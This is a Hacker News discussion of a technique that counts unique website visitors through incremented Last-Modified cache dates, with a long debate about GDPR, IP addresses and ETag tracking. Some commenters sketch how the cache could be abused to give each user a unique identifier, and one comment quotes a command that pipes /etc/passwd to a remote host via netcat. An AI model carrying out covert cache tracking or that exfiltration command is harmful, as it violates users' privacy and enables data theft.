hngopher.com

       [HN Gopher] Using a date-modified header to detect unique visito...
       ___________________________________________________________________
        
       Using a date-modified header to detect unique visitors without
       using cookies
        
       Author : mulhoon
       Score  : 306 points
       Date   : 2022-11-30 16:04 UTC (6 hours ago)
        
 (HTM) web link (notes.normally.com)
 (TXT) w3m dump (notes.normally.com)
        
       | [deleted]
        
       | a_c wrote:
       | Looks like a nice middle ground between no tracking at all and
       | needing all tracking to how well your website perform. Seems no
       | fingerprinting is involved so the website visitor is anonymized.
       | Unlike cookies where we can store whatever we like, this method
       | reveal only the unique visit, and its derivatives.
        
       | alkonaut wrote:
       | I very much prefer this to e.g fingerprinting. This is local to
       | one site and basically uniqueness only rather than an identifying
       | id. I don't feel "tracked" or "targeted" by this.
        
       | schoen wrote:
       | Martin Pool discovered pretty much this technique back in 2000:
       | 
       | https://catless.ncl.ac.uk/Risks/20.86.html#subj10.1
        
       | kiriberty wrote:
       | Cringe moment, this is abusing the feature where last-modified
       | was created for
        
       | someweirdperson wrote:
       | "Counting unique visitors"?
       | 
       | They are counting repeated requests. The unique count then is
       | "total requests" minus "repeated requests".
       | 
       | Wouldn't it be easiser to count the number of times a cached
       | resource is accessed?
        
         | BeefWellington wrote:
         | Time of last access + a counter of your visits once your hits
         | reach N>2 is probably enough to separate an individual from the
         | crowd here, unless your site is tremendously busy.
        
       | jahewson wrote:
       | The fact that this is being used in an analytics product that
       | claims to be compliant with all privacy laws is horrifying.
       | There's no way this is compliant _and_ it's deceptive.
        
         | andix wrote:
         | I agree. Well crafted laws (like the GDPR) forbid any kind of
         | tracking without consent. It's the what and not the how. It
         | doesn't matter if it's via cookies or any other way.
        
         | pyrolistical wrote:
         | Please explain why this isn't compliant?
        
           | erdos4d wrote:
           | This is a form of data collection and tracking that is
           | definitely against GDPR unless the user is informed of it and
           | consents to it. As it stands, there is no such notification
           | or consent. IANAL but I strongly suspect will get you fined
           | in the EU.
        
             | pyrolistical wrote:
             | What personal information is being collected here?
        
               | erdos4d wrote:
               | GDPR doesn't just cover personal info, it also forbids
               | tracking without consent, which includes cookies and
               | other means. This is just a technical trick to track
               | someone sans cookie, so I'm 100% certain they will fine
               | anyone doing it unless they get consent.
        
           | whartung wrote:
           | Arguably this can become personally identifiable, much like a
           | persons height of 7 feet becomes personally identifiable. How
           | many 7 foot people live in Elko Nevada? (I have no idea,
           | perhaps there's an entire colony of them.) But most very tall
           | people, well, stand out. "You're that tall guy from Elko!"
           | 
           | Early on, it's not personally identifiable. No doubt there
           | can be a lot of folks visiting the site only 10 times and
           | never again.
           | 
           | But as someone continues to visit, they begin to narrow down
           | who they are to "You're that guy that comes in here every day
           | with a yellow hat". They may not "know" who you are but, they
           | "know" who you are.
           | 
           | Eventually, there may be that one person that has the highest
           | hit rate, who always stands out.
        
             | jefftk wrote:
             | _> there may be that one person that has the highest hit
             | rate, who always stands out._
             | 
             | They could stop incrementing once they get to 10 (or
             | something that's high but common enough to be shared by
             | 1,000s of people).
        
             | Spivak wrote:
             | > You're that guy that comes in here every day with a
             | yellow hat
             | 
             | Yes but you have absolutely nothing at all to associate
             | that back to a person. Where are you going to find the data
             | "personal information of some kind of the people who visit
             | your site a lot?" You're not collecting it.
        
           | bpfrh wrote:
           | Because the GDPR isn't about any specific technology, but
           | concerns any processing of personal data:
           | 
           | https://gdpr.eu/what-is-gdpr/
           | 
           | Edit: Huh, I stand corrected I don't know if this would count
           | as personal data.
        
             | eurasiantiger wrote:
             | Storing a cache header is not an issue, but if it is used
             | as a unique identifier for user analytics purposes, it is
             | almost certainly personally identifying information, at
             | least after combining with other data. Since they are not
             | disclosing that they store something they use to ID users,
             | it is likely a GDPR violation, at least in spirit, and that
             | spirit is exactly what GDPR seeks to control.
        
               | bonestamp2 wrote:
               | > after combining with other data
               | 
               | The post says that they don't combine datapoints because
               | that would negate privacy.
        
               | eurasiantiger wrote:
               | _They_ don't but anyone using their service could.
        
               | ATsch wrote:
               | It is personal data regardless of how it is used. The
               | only question is if that use of personal data is
               | permissive.
               | 
               | Using it for user analytics, which is neither required to
               | run the service, nor in the users interest, nor
               | reasonably expected by the user, is almost definitly
               | illegitimate use.
        
           | jahewson wrote:
           | See my reply to b34r. In addition assigning users into
           | "anonymous" cohorts is a similar principle to FLoC which is
           | likely not GDPR compliant
           | https://searchengineland.com/googles-current-floc-tests-
           | aren...
        
             | tobr wrote:
             | That seems very different, as those cohorts are based on
             | actual personal data (correct me if I've misunderstood this
             | about FLoC). That's fundamentally different from a counter
             | I think.
        
               | jahewson wrote:
               | Yes that's right, FLoC is explicitly using personal data.
               | But now consider that that data is "you visited a
               | gardening website in the past month" and compare it with
               | "you visited this website 3 times yesterday" and the two
               | methods don't look so different.
        
               | tobr wrote:
               | I guess we all have different instincts when it comes to
               | this, but I find it much more expected and acceptable
               | that a website can see that I'm returning, than that they
               | get to know about random other interests I have based on
               | my general browsing history.
        
             | dahfizz wrote:
             | > Processing personal data to generate the cohort
             | assignment without the proper consent could also be a
             | violation
             | 
             | Using personal data to assign a cohort counts as using
             | personal data. Duh. The approach described in the article
             | doesn't use any personal data, though?
        
               | eganist wrote:
               | > Using personal data to assign a cohort counts as using
               | personal data. Duh. The approach described in the article
               | doesn't use any personal data, though?
               | 
               | Quoting the European commission:
               | 
               | "Personal data is any information that relates to an
               | identified or identifiable living individual. Different
               | pieces of information, which collected together can lead
               | to the identification of a particular person, also
               | constitute personal data."
               | 
               | I'd hazard a guess that it's the second part under which
               | the EC might find this to be within scope.
        
               | dahfizz wrote:
               | If I gave you a list of all the last-modified headers
               | from a day, how would you use that information to
               | identify a person?
        
               | ATsch wrote:
               | The definition of personal data under the GDPR is
               | anything that can be used to uniquely identify a natural
               | person (with sufficiently high probability). Both cookies
               | and date-modified meet that definition identically, as do
               | IP addresses.
               | 
               | That doesn't mean you can't use it at all. It just places
               | strong restrictions on what purpodes you can use it for.
               | The important point is just that those restrictions are
               | the same under GDPR for all of these technologies. It
               | doesn't matter how you uniquely identify users, what
               | matters is what you do with that information.
        
               | dahfizz wrote:
               | They don't assign a unique date-modified to each user.
               | They assign _everyone_ the _same_ date modified on their
               | first visit of the day. I don 't accept that this could
               | be used to uniquely identify a natural person.
               | 
               | You may be able to look at the headers and see that a
               | certain user made the most requests that day. That still
               | tells you nothing about their identity.
        
               | mytailorisrich wrote:
               | Nothing in the technique described here allows to
               | identify an individual directly or indirectly because
               | 'identifiers' are not unique and really no different than
               | standard 'last-modified' dates. Even if they were unique
               | further data would have to be collected in order to be
               | able to identify individuals and turn everything into
               | personal data.
               | 
               | What the technique may fall foul of, though, are cookie
               | laws.
        
             | Spivak wrote:
             | You can't just scare quotes anonymous without explaining
             | how it could deanonymize you. You're sitting there with
             | full access to the count data they collect. Use any
             | statistical methods you like, figure out what visits were
             | me.
        
             | mytailorisrich wrote:
             | The article you quote does not suggest that "assigning
             | users into "anonymous" cohorts is ... is likely not GDPR
             | compliant" and I fail to see how that would be the case.
             | Rather it seems to mention concerns that _processing
             | personal data_ to do so may be problematic.
        
         | b34r wrote:
         | Why? It's anonymous and doesn't collect any user data other
         | than IP and stuff from the user agent
        
           | jahewson wrote:
           | It's not anonymous in a low-entropy situation. A user can be
           | indirectly identified. This would violate GDPR.
        
             | CaveTech wrote:
             | No it wouldn't.
        
               | jahewson wrote:
               | Yes it would because a unique time stamp allows me to
               | indirectly identify a user.
        
               | SparkyMcUnicorn wrote:
               | How?
        
               | kapep wrote:
               | It is not a unique timestamp though. Each day, all
               | visitors start at 00:00:00. All users that visit the site
               | a second time get the timestamp 00:00:01 and so on.
        
               | CaveTech wrote:
               | Where are people getting these insane reads of GDPR. Any
               | bit of entropy is not going to violate GDPR. First, an
               | active client-server connection is required for any kind
               | supposed "identity" contained here, which would of course
               | include far more unique bits of identity/entropy, such as
               | IP. Secondly, even if the full DB of page view counts
               | were leaked you could not actually use it to identify a
               | user.
               | 
               | You have somehow perverted GDPR to believe it to mean `no
               | client may ever hold a unique state`. Good luck to anyone
               | making a claim that this is NOT possible in anything but
               | the most rudimentary application.
        
             | pyrolistical wrote:
             | I don't see how it can be used as described to identify an
             | individual person.
             | 
             | Multiple requests end up with the same time stamp which
             | means individuals are not traceable but as an aggregate
             | countable
        
               | jahewson wrote:
               | Only multiple requests within a given second get the same
               | time stamp. So if you have less than 86k hits per day,
               | then all your time stamps could be unique.
               | 
               | Edit: I misread the article here, where it said each
               | visit incremented the counter by one second. So my
               | calculation is not correct!
        
               | bradstewart wrote:
               | But how do I then tie that unique timestamp to an actual
               | _person_? Which is what GDPR is concerned about.
               | 
               | (edit: spelling)
        
               | dahfizz wrote:
               | How do you go from timestamp to identifying someone?
               | 
               | ~Every HTTP response has a Date field with a second-
               | resolution timestamp that might be unique. Are you
               | equally concerned about that?
        
               | TylerE wrote:
               | Birthday paradox means that will be far lower.
        
               | Thorrez wrote:
               | No, they are truncating the timestamp to the day. So all
               | visitors to the site on a specific day get the same
               | initial timestamp.
        
               | jahewson wrote:
               | Ah so they are, thanks! That's much better. Though for a
               | very, very low-traffic site this would still let me track
               | unique visitors.
        
               | genewitch wrote:
               | It is designed to track unique visitors, but not
               | differentiate between them at all.
               | 
               | both you and i visit the same new site today, we both get
               | a file our browser caches with today's date at 00:00:01.
               | Tomorrow when we go to the same site, our browser says we
               | got the file yesterday, so the server sends a new
               | modified date to the browser, set to tomorrow's date at
               | 00:00:02. Both of us have the same "new" file with the
               | new modification date/time.
               | 
               | if i go back the following day, the only thing the server
               | knows for certain, from just this header, is that i've
               | visited twice before. So i'm not counted as a unique
               | visitor.
               | 
               | That this could be used by assigning a _unique_ timestamp
               | to each visitor is where everyone 's mind is going, and
               | it feels like half are annoyed there's another way to
               | leak information, and the other half are annoyed they
               | didn't think of it prior to the end-of-year marketing
               | bonus deadline.
        
         | [deleted]
        
       | prpl wrote:
       | Do people use etag for such purposes?
        
         | cpeterso wrote:
         | Yes. ETag tracking has been a thing for decades:
         | 
         | https://en.wikipedia.org/wiki/HTTP_ETag#Tracking_using_ETags
        
       | habibur wrote:
       | This can be used like a cookie without using cookies as long as
       | definition of cookie stays "...a cookie is a small file stored on
       | your computer".
       | 
       | You have 30 million seconds per year as unique identifier to be
       | used against each individual for tracking. Even though the OP
       | didn't do it.
       | 
       | Put an expire time in between 10 years back to today and 300m
       | users tracked.
        
         | superjan wrote:
         | On the other hand, now that we know about it is easy to defeat:
         | a privacy conscious browser will just add a random amount of
         | minutes/seconds in the "if modified since" header. The only
         | risk is you sometimes trigger a reload because the resource was
         | modified in that interval.
        
           | Kuinox wrote:
           | It's harder, but you still leak bits of informations. If the
           | random function is known, statical analysis can still leak
           | out a bit of information.
        
       | [deleted]
        
       | legitster wrote:
       | Am I missing something? Abusing the cache meta-data to store data
       | on the user device seems much worse than a cookie.
       | 
       | I would have serious doubts of the longevity of such a trick, let
       | alone some of the technical limitations I am sure the service
       | has.
        
         | bonestamp2 wrote:
         | The missing piece is that no fingerprint is involved. They
         | don't have a way of identifying that user, but they are still
         | able to count the number of times that visitor loads the page.
         | So, it's not a tracker, it's a counter. It's like a loyalty
         | punch card at your local sandwich shop -- they can track how
         | many times you've been there by counting the hole punches, but
         | they don't have a unique identifier, so they can't track
         | details about those visits.
         | 
         | On the other hand, a cookie or a browser fingerprint contains
         | info that can uniquely identify that user so it can be used for
         | tracking.
        
           | legitster wrote:
           | A cookie doesn't _have_ to contain a fingerprint though.
           | 
           | In the same way, nothing in their current method necessarily
           | says they couldn't find a way to insert a fingerprint here.
        
             | bonestamp2 wrote:
             | Fair enough. At least they've told us how it works, so if
             | the data no longer matches that methodology in the future
             | then we can speculate that they've implanted a UID, unless
             | they tell us how it works again and the data is consistent
             | with the new methodology.
        
         | o_m wrote:
         | Cookie tracking without consent is illegal in Europe, so it is
         | a clever way to still do some basic web analytics.
        
           | roelschroeven wrote:
           | Tracking without consent is illegal in Europe, _regardless of
           | the method_. Alternative tracking methods are not workarounds
           | to get around the law; they are only workarounds in trying
           | not to be caught.
        
           | atoav wrote:
           | Yeah nice try. Law makers are not _that_ stupid. _Any_ way of
           | storing personal data is subject to this regulation.
           | 
           | And before you try the next thing, personal data is
           | everything that can be linked to a specific user, e.g. IP
           | addresses have been ruled to be personal data, some uuid that
           | helps you identify a user as well.
           | 
           | People should really read the law, and/or at least literate
           | commentary on it instead of assuming things or repeating what
           | someone else assumed.
        
             | mytailorisrich wrote:
             | This is definitely not personal data. The piece of
             | information is not linked to an individual and cannot be
             | used to identify an individual (not the same as a 'user'),
             | not least because it is not unique to each visitor:
             | According to the article all first requests get the same
             | 'last-modified' date, same for all second requests, etc.
             | 
             | Still, this stores data in the browser in a way that might
             | be deemed a technology similar to a cookie, and therefore
             | this might still fall within the various cookie laws, but
             | this is completely outside of personal data regs.
        
           | masklinn wrote:
           | Tracking without consent is illegal. This is a clever way to
           | get absolutely reamed, because you're not only in breach of
           | data protection laws you're actively trying to obfuscate it.
        
             | andix wrote:
             | The obfuscation part is probably irrelevant from a legal
             | perspective.
        
       | baggy_trough wrote:
       | This article is written like it's a great privacy breakthrough
       | but why is this any different from dropping a user id cookie?
        
         | jamincan wrote:
         | User's might block cookies, but this will likely still go
         | through.
        
         | jagged-chisel wrote:
         | How do you get more than 86,400 unique "identifiers" when they
         | only change every second?
        
           | marshray wrote:
           | A malicious site can put a different identifier on every
           | resource loaded by the browser.
           | 
           | There really is no bottom, is there.
        
           | koliber wrote:
           | There are also many timezones and you can encode information
           | in the timezone indicator as well. Also, you can use
           | different days. You can stretch this number into millions.
           | For a website that gets a certain number of unique visitors
           | per year, this may be unique enough.
        
           | tedunangst wrote:
           | Subdomains. (Not sure why I immediately thought subdomains
           | and not just multiple resources.)
        
           | toast0 wrote:
           | who says Last-Modified has to be a current date? you've got
           | the potential for 1669827111 users as of when I was composing
           | this comment without giving your users future dates.
        
           | WirelessGigabit wrote:
           | You don't have to. A unique visitor is someone who comes in
           | without a last-modified header. Set the header, that person
           | is no longer unique.
        
         | nine_k wrote:
         | It is materially different because it does not track individual
         | users.
         | 
         | It's comparable to dropping the same cookie to every visitor on
         | a particular day; a pretty low level of privacy invasion.
         | 
         | Also, this allows to _not_ use such things as visitor 's IP
         | address to collect meaningful statistics, which is a privacy
         | win for the user, and an accuracy win for the site operator.
        
           | kevincox wrote:
           | Exactly this. It is different from dropping a user id cookie,
           | but equivalent to dropping a cookie hit_count=0, hit_count=1,
           | ...
        
             | baggy_trough wrote:
             | Seems like the hit_count cookie would be a lot more
             | straightforward.
        
         | ChoHag wrote:
        
       | politelemon wrote:
       | If the counter is empty for you, disable your adblocker
       | temporarily. The withcabin.com domain might be blocked.
        
       | dahfizz wrote:
       | Threads like this kinda make me sad about HN. Every single
       | comment is about how this technique might possibly be abused to
       | track users in very specific scenarios (i.e. you may be able to
       | identify your most active user).
       | 
       | If a web server wanted to track you, they would just use your IP.
       | This is a clever technical trick to count your number of users
       | without collecting any personal data. I don't understand why that
       | is such a bad thing?
        
         | zackmorris wrote:
         | I think this cache date trick is clever!
         | 
         | There are at least three fallacies with stuff like GDPR that
         | trigger anxiety in people by convincing them that they can
         | somehow safeguard their own privacy while surfing hundreds of
         | websites per day, many in other countries. I'm not going to
         | fully discredit them, just give counterexamples:
         | 
         | 1) The internet can continue to work without tracking users
         | 
         | - Targeted advertising (can't have both, although I can't say
         | that I'll miss ads)
         | 
         | 2) Users care that companies have their personally identifiable
         | information (PII)
         | 
         | - Users care how companies share and abuse their data for
         | profit (they already know they're being tracked if they don't
         | use something like TorBrowser)
         | 
         | 3) Privacy protections actually result in privacy
         | 
         | - PRISM and similar will always find you:
         | https://en.wikipedia.org/wiki/List_of_government_mass_survei...
         | 
         | So I view all of this security theater with utter skepticism. I
         | think the only thing that can maybe save us is transparency.
         | Letting users download their data and using the threat of audit
         | to keep internet companies honest:
         | 
         | https://securiti.ai/blog/dsar-rights-and-compliance/
         | 
         | The rest of the squabbling about "no that's PII, you can't save
         | that!" has only resulted in endless nagging and distraction.
         | It's like trying to hide your address from the post office or
         | thinking that your phone number is secret because it's not in
         | the phonebook.
         | 
         | Although I do think it's kind of funny to make big companies
         | feel like they're living under a police state. They'll work
         | tirelessly to undermine these protections, which is why we'll
         | eventually abandon them like we did with prohibition and
         | McCarthyism because they just aren't enforceable when everyone
         | is breaking the law. Or (equally likely) they'll work to
         | bolster these laws to create new markets through power
         | imbalance, ensuring that only the largest companies can meet
         | compliance and smaller companies pay some sort of protection
         | money against the threat of litigation, which opens the door to
         | mass corruption. Both of these scenarios are ugly enough that I
         | think this entire rabbit hole is suspect.
        
         | Sohcahtoa82 wrote:
         | > If a web server wanted to track you, they would just use your
         | IP.
         | 
         | I'd think a HN user would know that using an IP to track isn't
         | effective.
         | 
         | For most home desktop users, at best, it tracks an individual
         | household, not a person. For corporate users and highly
         | privacy-conscious home users, it's probably completely
         | worthless as VPNs will make everyone come from a single IP.
         | 
         | For mobile users, it's completely worthless. You'd be tracking
         | users of a specific WiFi network. If your phone is connecting
         | via IPv4, then who knows who you're tracking, as phones on a
         | mobile network will share an IP address.
        
           | ketralnis wrote:
           | And if you think VPN users are too obscure a use case to
           | account for, a specific case I've dealt with is (1) all of
           | AOL coming from one IP in Virginia (yes this was a while ago)
           | and (2) almost every university appearing as a single IP (on
           | a website frequented by university students)
        
             | jgalt212 wrote:
             | As recently as 2006, an entire country was behind a VPN
             | using a single public IP address. If lore can be
             | believed...
             | 
             | https://superuser.com/questions/1013630/why-does-qatar-
             | use-a...
        
             | kccqzy wrote:
             | Universities do that now? When I was in college, if one
             | connects to the visitor network they'd give you a RFC1918
             | address with NAT and a restrictive firewall, but if one
             | connects to the regular network and authenticates as a
             | student, they give you a publicly routable IP address.
        
               | jesprenj wrote:
               | Depends on a lot of factory. The primary school I was a
               | student at had public IPs at every computer, our national
               | academic and research network operators are encouraging
               | local network operators to avoid private IPs. But the
               | high school at which I'm currently a student, has private
               | IP addresses on every computer and a single external IPv4
               | for the entire facility. It's not so one sided.
        
               | lazide wrote:
               | Many will also push http/https proxies regardless of IP
               | addressing schemes, so even if one user bypasses it,
               | anyone using defaults will come from whatever the
               | external proxy IP is.
        
               | ketralnis wrote:
               | I went to a community college that did transparent HTTP
               | proxying with not just deep packet inspection but caching
               | and "security"-oriented javascript injection. Headers
               | would get reordered, and its parser wasn't perfect so
               | multi-line headers would get broken sometimes. They'd
               | inject JS into pages to scan for... something? Other
               | injected JS? I have no idea. But it was impossible to
               | directly connect to another server without going through
               | their proxy even though from the TCP layer it looked like
               | you were. Lots of difficult to debug issues.
        
               | lazide wrote:
               | Wow, that's impressively evil. Right up there with the
               | old 'rewrite DNS traffic' trick from ISPs.
               | 
               | Any idea what make/model the proxy was?
        
             | mike_d wrote:
             | At a previous job we tracked unique visitors to prevent ad
             | fraud. You'd find not only individual IPs with thousands of
             | users behind them, but also larger populations of users
             | numbering in the tens of thousands behind a small block of
             | 8-16 IPs.
             | 
             | The craziest was a large multinational corporation that (I
             | guess for security?) changed their egress IP daily. The
             | first three octets remained the same and the fourth was
             | equal to the day of the month UTC. Really screws things up
             | when you use a 14 day rolling window of previous traffic
             | for comparisons.
        
           | bawolff wrote:
           | I mean, i expect most people who use a vpn to also use
           | incognito mode as well, which i assume would prevent this
           | type of tracking.
        
         | [deleted]
        
         | IshKebab wrote:
         | It's not a clever technical trick. It's a pointless technical
         | trick.
         | 
         | You can do exactly the same thing with cookies and they are
         | better for privacy because there's an opt out mechanism.
         | They're how you're _supposed_ to do this sort of thing.
         | 
         | Using a trick like this is no different to cookies in the eyes
         | of the GDPR. So the only reason to use this trick is if you
         | don't want to respect your users' privacy by being able to
         | block cookies.
        
         | EGreg wrote:
         | I mean, if people wanted to track visitors without cookies,
         | they'd just use etags...
         | 
         | https://www.secjuice.com/etag-entity-tag-tracking/
         | 
         | Has Apple's ITP closed this particular loophole by ignoring
         | etags in third party iframes and capping them to 7 days etc. ?
         | 
         | It seems browsers will want to restrict ALL first party cookies
         | to 7 days unless the visitor explicitly allows some domain to
         | store their identity.
         | 
         | Frankly speaking, identity can be done better without cookies.
         | Look at Web3 sign-ins, we need something built into the browser
         | and seamless. For now maybe an extension. Then browser makers
         | can have a privacy mode that retires cookies, entirely.
         | 
         | But how are you supposed to do caching without storing and
         | sending identifying data equivalent to cookies?
         | 
         | Thoughts?
        
         | fanso99 wrote:
         | My understanding is that most commenters are less critical of
         | this specific implementation, but are alarmed by how this new
         | technique could be used by other more nefarious parties in the
         | future.
         | 
         | Counting visits is probably still not a fully GDPR-complaint
         | use case, as the server stores data on the client's machine
         | which is indistinguishable from a cookie containing a counter.
        
         | tinus_hn wrote:
         | First, an IP address is considered personal data in the EU.
         | 
         | Second, an IP address is not enough, it may change or be
         | shared. The advertisers 'need' to track you forever to serve
         | you relevant ads. So they devise all kinds of tricks to do so.
        
           | aardvarkr wrote:
           | > First, an IP address is considered personal data in the EU.
           | 
           | I don't believe that's true. To my knowledge, GDPR only
           | treats IP address as personal data if it is associated with
           | actual identifying information (like name or address).
           | Collecting IP address alone, and not associating it with
           | anything else, is completely fine (otherwise nginx and
           | apache's default configs would violate GDPR), and through
           | them basically every website would violate GDPR.
        
             | fanso99 wrote:
             | Collecting IP addresses and linking them to a user ID is
             | considered PII as far as I know.
        
               | EGreg wrote:
               | So the idea is that you can't legally collect information
               | in private that you can technically collect.
               | 
               | As long as a company is able to keep it a secret, they
               | won't get caught.
               | 
               | Witness the hundreds of violations of public trust by
               | Facebook:
               | 
               | https://www.independent.co.uk/tech/facebook-app-
               | recording-ca...
               | 
               | The only complete solution is technological!
        
             | mytailorisrich wrote:
             | That's correct. IP addresses are not personal data in
             | themselves but they may become so if further data are
             | collected or accessible which allow to identify individuals
             | when used together with IP addresses.
        
           | rzzzt wrote:
           | CGNAT complicates matters even further. Sometimes I'm placed
           | way off within <country> if a site tries to go by GeoIP
           | databases, as the provider placed a bunch of households
           | behind a single address.
        
         | JohnFen wrote:
         | After decades of straight-up abuse by this sector of the
         | industry, including the subversion of countless "privacy
         | respecting" data collection techniques, I think an
         | extraordinary amount of skepticism and suspicion is more than
         | understandable.
        
           | kccqzy wrote:
           | Why would you put privacy respecting in quotes? The
           | subversion of those techniques are probably just because
           | those techniques are so new and people haven't had better
           | technologies yet.
           | 
           | I personally consider those privacy respecting data
           | collection techniques as a parallel with the development and
           | use of cryptography on the web. In the beginning pretty much
           | no one online used cryptography; later on we started using
           | them but used weak ones ("export" cipher suites for example,
           | or just look at the issues in early protocols like SSL 2.0 or
           | SSL 3.0); nowadays almost everyone uses strong cryptography.
           | Similarly, in the beginning pretty much no one cared about
           | privacy when they did data collection; then we had begun to
           | care more about privacy, but many schemes are easily broken
           | due to for example misguided ideas of anonymization
           | ("anonymization by hashing"), and we are also starting to see
           | the development of newer private information retrieval
           | schemes and differential privacy, etc. Unlike the cynics on
           | this HN thread, I am quite confident that maybe a decade down
           | the road the majority of data collection done by companies
           | will be in a privacy preserving manner. Of course there will
           | be outliers much like there are still websites that don't use
           | https but those will be few and far between.
        
             | JohnFen wrote:
             | I quoted the term not with the intention of disparaging the
             | notion, but to indicate that I'm referring to a specific
             | class of approaches. That said, the term has also been
             | abused to the point where when it's used, I immediately
             | doubt that it's accurate.
        
         | mozman wrote:
         | Fingerprinting using WebRTC is far more effective. IPs are
         | useless.
        
         | nottorp wrote:
         | We tend to object to people considering it normal to track us.
         | Regardless of means.
        
           | dahfizz wrote:
           | This is not tracking. Could you explain why you think it is?
        
             | fanso99 wrote:
             | Storing a cookie with a counter still requires consent
             | afaik. If I am right, then this technique is not
             | sufficiently different and also requires consent.
        
               | robertlagrant wrote:
               | Why would that require consent?
        
               | chriswarbo wrote:
               | Consent is _always_ required; even if you just give
               | people a random UUID, with no associated session /etc.,
               | that _always_ requires consent.
               | 
               | There is a separate question, of whether consent is
               | implied. If the identifying information is required to
               | provide the user with a service they requested (e.g. a
               | cookie for their online shopping cart), then consent is
               | implied; no need to ask.
        
             | nottorp wrote:
             | Could you explain why i should care, considering the
             | current climate online?
             | 
             | When you try to cram a list of 500 "legitimate interests"
             | down my throat, I will consider no interest as legitimate.
             | 
             | No matter what your goals are, you're in an industry that
             | has zero trust these days.
        
               | dahfizz wrote:
               | Without viable alternatives, sites will continue to use
               | Google Analytics. If people like you fear-monger every
               | alternative, sites will continue to use Google Analytics.
               | 
               | The method described in the article collects no personal
               | data, collects no identifiable data, and is objectively
               | more user-respecting than Google Analytics. But the
               | behavior by people like you will help make sure that
               | these alternatives don't gain traction and Google
               | maintains their monopoly.
        
               | EGreg wrote:
               | Not only that. The ability to track your own visitors is
               | BUILT INTO how the web operates.
               | 
               | All a site has to do is include analytics in its server-
               | side library. And that's it. Doesnt even need CNAME
               | cloaking. It can send the analytics anywhere.
               | 
               | The thing ITP and others try to stop is tracking users
               | ACROSS sites.
               | 
               | But if you use single-sign-on with FB or any other
               | service, they can get your public photo, name and just
               | find you on faceboon thru some search engine that
               | spidered all profiles.
               | 
               | So if you really want to be anonymous, stop using the
               | single sign on and reusing passwords etc.
        
               | ohbtvz wrote:
               | But google analytics isn't viable. It's illegal to use in
               | the EU. Here's an explanation by, well, a viable
               | alternative to google analytics:
               | https://matomo.org/blog/2022/05/google-analytics-4-gdpr/
               | 
               | (I don't have a horse in this battle - my personal
               | website doesn't have analytics at all.)
        
               | stalfosknight wrote:
               | How about we just _stop_ tracking users and hoovering up
               | private data?
        
           | xapata wrote:
           | Who's "we"? I don't mind it. I want advertisers to give me
           | more relevant advertising.
        
             | mschuster91 wrote:
             | I don't want _any_ unsolicited advertising - and I wish our
             | societies would decide to outright _ban_ advertising:
             | Outdoor advertising is a nuisance for the eyes, radio and
             | TV advertising is annoying AF (particularly as it tends to
             | be mixed at a much greater loudness than the program
             | running, my conspiracy theory is that this is done so
             | people are forced to hear it when they go to the loo),
             | paper advertising (e.g. in newspapers, flyers or postal
             | spam) is a waste of paper and online advertising is an
             | insane danger for privacy and a vector for distribution of
             | malware.
             | 
             | Ideally, we'd have independent consumer protection
             | entities, either government or private (e.g. German
             | Stiftung Warentest), that would get products from companies
             | to rank and test, so consumers could make actually informed
             | decisions instead of being lured by hyped up advertising
             | claims.
        
             | dspillett wrote:
             | Depends how you define relevant. Since actively trying to
             | block stalky advertising behaviours I've had more
             | interesting adverts (by "interesting" I mean new-to-me, not
             | the "do you want another one of the thing you've already
             | bought all you need of for a while" types). Things are
             | relevant enough if, for instance, I get running related
             | adverts while reading an article about other runners or
             | browsing shoes.
             | 
             | In my experience the stalky behaviour doesn't improve the
             | advertising relevance from my PoV, so the fact it means
             | that all that derived information, some of it definitely
             | PII, is out there so should anyone be able to hack into it
             | they could use it for fraudulent purposes (identity theft,
             | spear-fishing my contacts, ...), makes the situation lose-
             | lose for me.
             | 
             | It is worse for other people, as they have information that
             | advertisers like to derive that might be extra sensitive.
             | Being white, male, cis, middle-class, ete, with a life not
             | interesting enough for there to be much to convincingly
             | blackmail or threaten me about, living in western Europe,
             | I'm pretty safe, but this can't be said for others
             | especially in certain parts of the world (scarily religious
             | ruled countries with bad records on individual rights, like
             | Qatar and America to give two examples).
        
               | xapata wrote:
               | I think you're conflating two different kinds of
               | surveillance. The article is incrementing a counter to
               | track the number of unique visitors.
               | 
               | If one is worried about blackmail or violence, especially
               | from a government, then one should take precautions
               | beyond complaining about the prevalence of browser
               | cookies. Modern life, carrying a mobile internet device
               | with GPS service, using a credit card, and going to
               | places with security cameras, presents a variety of
               | surveillance methods.
        
             | throwaway0x7E6 wrote:
             | we the normal people
        
           | lolinder wrote:
           | Counting is not the same as tracking. The technique proposed
           | would in most cases be useless for trying to _distinguish_
           | individuals, much less identify them. It 's the computer
           | equivalent of the person standing out in front of Costco with
           | a clicker counter.
        
             | MereInterest wrote:
             | In principle, screen resolution would in most cases be
             | useless for trying to distinguish individuals. After all,
             | it wouldn't even distinguish the underlying hardware, let
             | alone a user of that hardware. But given omnipresent
             | tracking, it's one more bit that can be used to identify
             | you.
             | 
             | In addition, your comment shows a severe lack of
             | imagination. Suppose I'm a malicious server who wishes to
             | track users.
             | 
             | * For each new user, select a random "late-modified" date.
             | Now, I can clearly distinguish between multiple different
             | users, because "1985-01-01T00:00:10" is probably the 10th
             | visit from whoever was given "1985-01-01T00:00:00" on their
             | first visit.
             | 
             | * If I have too many users for the above approach to
             | uniquely identify a person, add more cached items. With
             | HTTP/2, both HTTP requests would use the same TCP
             | connection, so I can correlate the requests together.
             | 
             | And, bam. That goes from "useless for trying to distinguish
             | individuals, much less identify them" to a unique
             | identifier stored in the cache invalidation dates.
        
               | lolinder wrote:
               | That is a different technique that uses the same medium
               | of storage. When I say "this technique" I'm referring to
               | specifically what was discussed in the article.
               | 
               | "Evil tracking companies will do evil things with any
               | protocol features you give them" is already well known
               | and there's not much to say about it that hasn't been
               | said. What OP is _actually_ doing is clever and new to
               | me.
        
               | MereInterest wrote:
               | I agree that it is clever, and it is new to me as well.
               | However, saying that an obvious extension to a technique
               | (posted by multiple people independently, no less) is a
               | different technique altogether and therefore not germane
               | is going a bit far.
               | 
               | If I post a privilege escalation exploit that allows me
               | to execute "cat /etc/sudoers", and somebody points out
               | that it could also be used to execute "cat /etc/passwd |
               | netcat malicious-remote-server.com", that's an obvious
               | extension of the same technique. This is the same, where
               | the same technique may be used for more intrusive attacks
               | than are performed in the initial proof of concept.
        
               | lolinder wrote:
               | This kind of attack isn't new, though, trackers have been
               | using side channel tracking forever now. A quick search
               | shows that this _exact_ side channel tracking
               | vulnerability was discussed in the year 2000 [0].
               | 
               | I'm not saying the technique isn't similar: I just object
               | to people dogpiling on OP because _other_ people can and
               | do abuse the same header in nefarious ways. It 's not
               | constructive, just a pointless attack on someone who's
               | actually trying to improve privacy.
               | 
